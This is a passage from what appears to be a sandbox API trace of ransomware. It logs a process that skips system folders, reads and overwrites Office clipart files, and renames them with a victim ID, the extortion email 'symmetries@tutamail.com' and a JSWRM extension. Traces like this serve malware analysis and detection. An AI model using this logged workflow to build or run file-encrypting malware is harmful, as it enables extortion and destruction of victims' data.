CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0075.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0075.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0075.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0075.974] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0075.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0075.974] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0075.974] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00117_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00117_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00117_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0075.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.975] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd76a969, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd76a969, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2040, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD00121_.WMF", cAlternateFileName="")) returned 1 [0075.975] lstrcmpiW (lpString1="DD00121_.WMF", lpString2=".") returned 1 [0075.975] lstrcmpiW (lpString1="DD00121_.WMF", lpString2="..") returned 1 [0075.975] lstrcmpiW (lpString1="DD00121_.WMF", lpString2="...") returned 1 [0075.975] lstrcmpiW (lpString1="DD00121_.WMF", lpString2="windows") returned -1 [0075.975] lstrcmpiW (lpString1="DD00121_.WMF", lpString2="recovery") returned -1 [0075.975] lstrcmpiW (lpString1="DD00121_.WMF", lpString2="perflogs") returned -1 [0075.975] lstrcmpiW (lpString1="DD00121_.WMF", lpString2="documents and settings") returned -1 [0075.975] lstrcmpiW (lpString1="DD00121_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.975] lstrcmpiW (lpString1="DD00121_.WMF", lpString2="system volume information") returned -1 [0075.975] lstrcmpiW (lpString1="DD00121_.WMF", lpString2="msocache") returned -1 [0075.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0075.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00121_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00121_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00121_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0075.975] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0075.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00121_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00121_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00121_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0075.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.976] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00121_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.977] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8256) returned 1 [0075.977] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2040) returned 0x24c1d0 [0075.977] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2040, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2040, lpOverlapped=0x0) returned 1 [0075.979] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.979] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2040, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2040, lpOverlapped=0x0) returned 1 [0075.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.979] CloseHandle (hObject=0x460) returned 1 [0075.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0075.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0075.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0075.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0075.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0075.979] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.979] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00121_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00121_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0075.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.980] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd744774, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd744774, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x73bc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD00234_.WMF", cAlternateFileName="")) returned 1 [0075.980] lstrcmpiW (lpString1="DD00234_.WMF", lpString2=".") returned 1 [0075.980] lstrcmpiW (lpString1="DD00234_.WMF", lpString2="..") returned 1 [0075.980] lstrcmpiW (lpString1="DD00234_.WMF", lpString2="...") returned 1 [0075.980] lstrcmpiW (lpString1="DD00234_.WMF", lpString2="windows") returned -1 [0075.980] lstrcmpiW (lpString1="DD00234_.WMF", lpString2="recovery") returned -1 [0075.980] lstrcmpiW (lpString1="DD00234_.WMF", lpString2="perflogs") returned -1 [0075.980] lstrcmpiW (lpString1="DD00234_.WMF", lpString2="documents and settings") returned -1 [0075.980] lstrcmpiW (lpString1="DD00234_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.980] lstrcmpiW (lpString1="DD00234_.WMF", lpString2="system volume information") returned -1 [0075.980] lstrcmpiW (lpString1="DD00234_.WMF", lpString2="msocache") returned -1 [0075.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0075.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00234_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00234_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00234_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0075.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0075.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00234_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.980] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00234_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00234_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.980] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0075.980] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.981] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.981] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=29628) returned 1 [0075.981] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.981] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x73b0) returned 0x24c1d0 [0075.981] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x73b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x73b0, lpOverlapped=0x0) returned 1 [0075.985] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.985] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x73b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x73b0, lpOverlapped=0x0) returned 1 [0075.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.985] CloseHandle (hObject=0x460) returned 1 [0075.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0075.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0075.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0075.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0075.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0075.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.985] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00234_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00234_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0075.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.986] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd744774, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd744774, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa82, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD00255_.WMF", cAlternateFileName="")) returned 1 [0075.986] lstrcmpiW (lpString1="DD00255_.WMF", lpString2=".") returned 1 [0075.986] lstrcmpiW (lpString1="DD00255_.WMF", lpString2="..") returned 1 [0075.986] lstrcmpiW (lpString1="DD00255_.WMF", lpString2="...") returned 1 [0075.986] lstrcmpiW (lpString1="DD00255_.WMF", lpString2="windows") returned -1 [0075.986] lstrcmpiW (lpString1="DD00255_.WMF", lpString2="recovery") returned -1 [0075.986] lstrcmpiW (lpString1="DD00255_.WMF", lpString2="perflogs") returned -1 [0075.986] lstrcmpiW (lpString1="DD00255_.WMF", lpString2="documents and settings") returned -1 [0075.986] lstrcmpiW (lpString1="DD00255_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.986] lstrcmpiW (lpString1="DD00255_.WMF", lpString2="system volume information") returned -1 [0075.986] lstrcmpiW (lpString1="DD00255_.WMF", lpString2="msocache") returned -1 [0075.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0075.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00255_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00255_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00255_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0075.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0075.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00255_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00255_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00255_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0075.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00255_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.042] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2690) returned 1 [0076.042] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa80) returned 0x23fc98 [0076.042] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xa80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xa80, lpOverlapped=0x0) returned 1 [0076.043] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.043] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xa80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xa80, lpOverlapped=0x0) returned 1 [0076.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0076.044] CloseHandle (hObject=0x460) returned 1 [0076.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0076.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0076.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0076.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0076.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0076.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.044] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00255_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00255_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft 